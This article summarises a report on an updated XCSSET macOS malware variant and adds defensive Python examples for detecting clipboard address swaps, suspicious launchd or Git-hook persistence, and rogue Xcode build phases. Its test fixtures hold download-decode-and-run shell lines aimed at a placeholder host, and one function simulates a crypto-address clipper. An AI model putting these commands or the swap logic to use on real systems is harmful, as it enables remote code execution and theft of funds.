Cybersecurity researchers have identified an updated variant of the XCSSET malware targeting macOS systems. The new iteration has drawn attention because of its refined techniques and expanded capabilities, in particular browser data theft, clipboard hijacking, and additional mechanisms for persistence.
According to a report released by the Microsoft Threat Intelligence team, the updated XCSSET is a modular malware that infects Xcode projects used by software developers. The exact distribution method has not been confirmed; the working assumption is that it propagates through Xcode project files shared among developers working on macOS applications, which makes it a supply-chain risk for any team that exchanges projects or pulls them from public repositories.
The latest variant builds on earlier versions with heavier encryption and obfuscation to evade detection, and it uses run-only compiled AppleScripts, which are distributed without their source and are therefore harder for analysts and security tools to inspect. It also broadens its data-theft capabilities to cover the Firefox browser, widening the set of targets beyond what earlier versions collected.
A particularly alarming addition is a clipper sub-module. This component monitors the clipboard for content matching the patterns of cryptocurrency wallet addresses. When a match is found, the malware replaces the legitimate address in the clipboard with an attacker-controlled address of the same format, so that a transaction the user pastes and sends goes to the attacker instead. Because the substituted address still looks valid, a user who does not compare the pasted address with the intended one character by character will not notice the swap, and the loss is only discovered after the funds have moved.
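The clipper logic described above, and the check a defender can run against it, as an added example that is not code from the Microsoft report or from XCSSET itself. The page does not say which currencies the clipper matches, so the three address families below (Bitcoin base58, Bitcoin bech32, Ethereum) are assumptions for illustration; the Bitcoin addresses are widely published documentation examples and the Ethereum one is a made-up hex string. `clipper_substitute` shows what the malware does on each clipboard change, and `PasteGuard` shows the defender-side comparison of what was copied against what is about to be pasted.

```python
import re

# Assumed address families (the report does not list which ones the clipper
# matches). Base58 excludes 0, O, I and l; bech32 has its own 32-char alphabet;
# Ethereum is 0x followed by 40 hex digits.
WALLET_PATTERNS = {
    "btc-base58": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{39,59}$"),
    "eth":        re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def wallet_kind(text):
    """Return which address family `text` belongs to, or None if it is not
    shaped like a wallet address at all."""
    text = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def clipper_substitute(clipboard, attacker_addresses):
    """What a clipper does on every clipboard change: if the content is a
    wallet address of a family the attacker holds an address for, return the
    attacker's address of the *same* family so the paste still looks valid.
    Anything else is passed through untouched so the user sees nothing odd."""
    kind = wallet_kind(clipboard)
    if kind is None or kind not in attacker_addresses:
        return clipboard
    return attacker_addresses[kind]


class PasteGuard:
    """Defender-side check: remember what the user actually copied and, just
    before a paste, compare it with what the clipboard now holds. One wallet
    address silently turning into another of the same family is the clipper's
    signature; ordinary clipboard use does not look like that."""

    def __init__(self):
        self.last_copied = None

    def on_copy(self, text):
        self.last_copied = text.strip()

    def check_before_paste(self, clipboard_now):
        """Return None if the paste is consistent with the last copy, else a
        dict describing the suspected swap."""
        now = clipboard_now.strip()
        if self.last_copied is None or now == self.last_copied:
            return None
        copied_kind = wallet_kind(self.last_copied)
        if copied_kind is not None and wallet_kind(now) == copied_kind:
            return {"kind": copied_kind, "copied": self.last_copied, "clipboard": now}
        return None


# Constructed sample data: the user's address and the attacker's address table.
USER_BTC = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
ATTACKER = {
    "btc-base58": "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
    "eth": "0x" + "ab12" * 10,
}


def demo():
    """Copy a Bitcoin address, let the simulated clipper fire, then run the
    pre-paste check. Returns the alert dict (None would mean no swap seen)."""
    guard = PasteGuard()
    guard.on_copy(USER_BTC)
    tampered = clipper_substitute(USER_BTC, ATTACKER)  # clipper runs in between
    return guard.check_before_paste(tampered)


if __name__ == "__main__":
    print(demo())
```

The guard only alerts when the copied value and the current clipboard value are both addresses of the same family; a user copying a sentence and then an address, or two different addresses on purpose, is not flagged, so the check stays quiet in normal use.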
The Microsoft report also describes changes to the infection chain. The fourth stage now consists of an AppleScript application that runs a shell command to fetch further AppleScripts, which in turn gather system information. Splitting the chain into stages fetched at run time means that the early stages reveal little about what follows, and an analyst has to capture each download to see the whole.
Other changes include enhanced checks for the Mozilla Firefox browser and refined logic for detecting whether the Telegram messaging app is installed. The new version also introduces modules that replace earlier ones. The module previously known as “seizecj” has been renamed “vexyeqj”; it downloads a further module named “bnk,” which is run via AppleScript and contains functions for data validation, encryption, decryption, and fetching additional commands from the command-and-control (C2) server, alongside the clipper functionality.
Further modules in this update include “neq_cdyd_ilvcmwx,” similar to an earlier module that exfiltrates files to the C2 server; “xmyyeqjx,” which establishes persistence through a LaunchDaemon; “jey,” which provides Git-based persistence; and “iewmilh_cdyd,” which harvests data from Firefox using a modified version of the open-source tool HackBrowserData.
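A small audit for the two persistence locations named above, added here as an example and not taken from the Microsoft report or from XCSSET. The page does not describe how the “jey” module uses Git, so the assumption here is that Git persistence means an active hook in `.git/hooks`; the indicator strings are generic heuristics chosen for this example, not signatures. The plist and hook contents are constructed fixtures.

```python
import os
import plistlib

# Generic indicators chosen for this example (not signatures from the report):
# a script interpreter, a downloader, an encoded payload, or a launch path in
# a world-writable location.
SUSPICIOUS_TOKENS = (
    "osascript", "curl ", "wget ", "base64", "eval ",
    "/tmp/", "/private/tmp/", "/Users/Shared/", "/private/var/",
)


def _token_hits(text):
    return [f"references {t.strip()!r}" for t in SUSPICIOUS_TOKENS if t in text]


def audit_launchd_plist(data):
    """Parse a LaunchDaemon/LaunchAgent plist (bytes) and return the reasons
    it deserves a closer look; an empty list means nothing stood out."""
    job = plistlib.loads(data)
    args = list(job.get("ProgramArguments", []))
    if "Program" in job:
        args.insert(0, job["Program"])
    cmdline = " ".join(str(a) for a in args)
    reasons = _token_hits(cmdline)
    if job.get("RunAtLoad") and (job.get("KeepAlive") or job.get("StartInterval")):
        reasons.append("starts at boot/login and is kept alive or re-run on a timer")
    return reasons


def audit_git_hook(name, content):
    """Hooks are not versioned, so an active (non-.sample) hook in a freshly
    cloned repository was put there locally. Return reasons to inspect it."""
    if name.endswith(".sample"):
        return []
    return [f"active hook {name!r}"] + _token_hits(content)


def scan_tree(root):
    """Walk `root`, apply both audits, and yield (path, reasons) for findings.
    Point it at a home directory for hooks and at /Library for daemons."""
    for dirpath, _dirnames, filenames in os.walk(root):
        base = os.path.basename(dirpath)
        parent = os.path.basename(os.path.dirname(dirpath))
        if base == "hooks" and parent == ".git":
            for fn in filenames:
                path = os.path.join(dirpath, fn)
                with open(path, errors="replace") as fh:
                    reasons = audit_git_hook(fn, fh.read())
                if reasons:
                    yield path, reasons
        elif base in ("LaunchDaemons", "LaunchAgents"):
            for fn in filenames:
                if not fn.endswith(".plist"):
                    continue
                path = os.path.join(dirpath, fn)
                try:
                    with open(path, "rb") as fh:
                        reasons = audit_launchd_plist(fh.read())
                except Exception as exc:  # binary junk or a malformed plist
                    reasons = [f"unparseable plist: {exc}"]
                if reasons:
                    yield path, reasons


# Constructed fixtures (illustrative, not real XCSSET artefacts).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/osascript</string>
    <string>/Users/Shared/.cache/main.scpt</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/backup</string><string>--nightly</string>
  </array>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>2</integer></dict>
</dict></plist>"""

SUSPICIOUS_HOOK = "#!/bin/sh\ncurl -fsSL http://example.invalid/s | base64 -d | sh\nexit 0\n"

if __name__ == "__main__":
    print(audit_launchd_plist(SUSPICIOUS_PLIST))
    print(audit_git_hook("post-commit", SUSPICIOUS_HOOK))
```

The launchd check keys on the command line rather than the job label, because a label can be made to look like anything; the hook check treats every non-sample hook as worth a glance, since a clean clone should have none.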
In light of these developments, security practitioners urge macOS users to keep their systems and Xcode up to date, to inspect Xcode projects obtained from repositories or third parties before building them, and to verify cryptocurrency addresses after pasting and before sending, since a clipboard swap is invisible until the pasted value is compared with the intended one.
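One concrete way to inspect a received Xcode project, added here as an example and not code from the Microsoft report or from XCSSET. It assumes that the place to look first is the shell-script build phases in `project.pbxproj`, since those run on every build; the page itself does not say how XCSSET hooks into a project, so that is an assumption. The parser handles the one-line, backslash-escaped form Xcode uses for `shellScript`, and the indicator list is a generic heuristic. The `project.pbxproj` excerpt below is a constructed fixture.

```python
import os
import re

# Heuristic indicators for a build phase that has no business in a normal
# project (chosen for this example, not taken from the report).
INDICATORS = ("curl", "wget", "base64", "osascript", "eval ", "| sh", "| bash",
              "python -c", "nohup", "xattr", "/tmp/", "/users/shared/")

# pbxproj is an old-style plist; a regex over each PBXShellScriptBuildPhase
# block is enough to pull out the name and the script.
_PHASE = re.compile(r"isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};", re.S)
_NAME = re.compile(r'\bname = (?:"([^"]*)"|([^;]+));')
_SCRIPT = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')


def _unescape(s):
    """Xcode stores the script on one line with \\n, \\t and \\" escapes."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def find_shell_phases(pbxproj_text):
    """Return one dict per PBXShellScriptBuildPhase: name, decoded script and
    the indicators found in it (an empty list means none)."""
    phases = []
    for m in _PHASE.finditer(pbxproj_text):
        body = m.group(1)
        nm = _NAME.search(body)
        name = (nm.group(1) or nm.group(2)).strip() if nm else "(unnamed)"
        sm = _SCRIPT.search(body)
        script = _unescape(sm.group(1)) if sm else ""
        lowered = script.lower()
        hits = [t.strip() for t in INDICATORS if t in lowered]
        phases.append({"name": name, "script": script, "indicators": hits})
    return phases


def audit_project(xcodeproj_dir):
    """Read <name>.xcodeproj/project.pbxproj and return only flagged phases."""
    with open(os.path.join(xcodeproj_dir, "project.pbxproj"), encoding="utf-8") as fh:
        return [p for p in find_shell_phases(fh.read()) if p["indicators"]]


# Constructed fixture: two phases, one ordinary linter run and one that pulls
# and executes a remote, encoded payload in the background.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		0A1B2C3D4E5F60718293A4B5 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Lint";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "swiftlint --quiet\n";
		};
		C6D7E8F9A0B1C2D3E4F50617 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Fetch deps";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL http://example.invalid/p | base64 -d | sh &\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

if __name__ == "__main__":
    for phase in find_shell_phases(SAMPLE_PBXPROJ):
        if phase["indicators"]:
            print(phase["name"], "->", phase["indicators"])
```

Run `audit_project` against the `.xcodeproj` directory before the first build; a project that needs a network fetch at build time should at least name where it goes and why, and an unnamed phase that decodes and pipes into a shell has no legitimate reason to exist.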

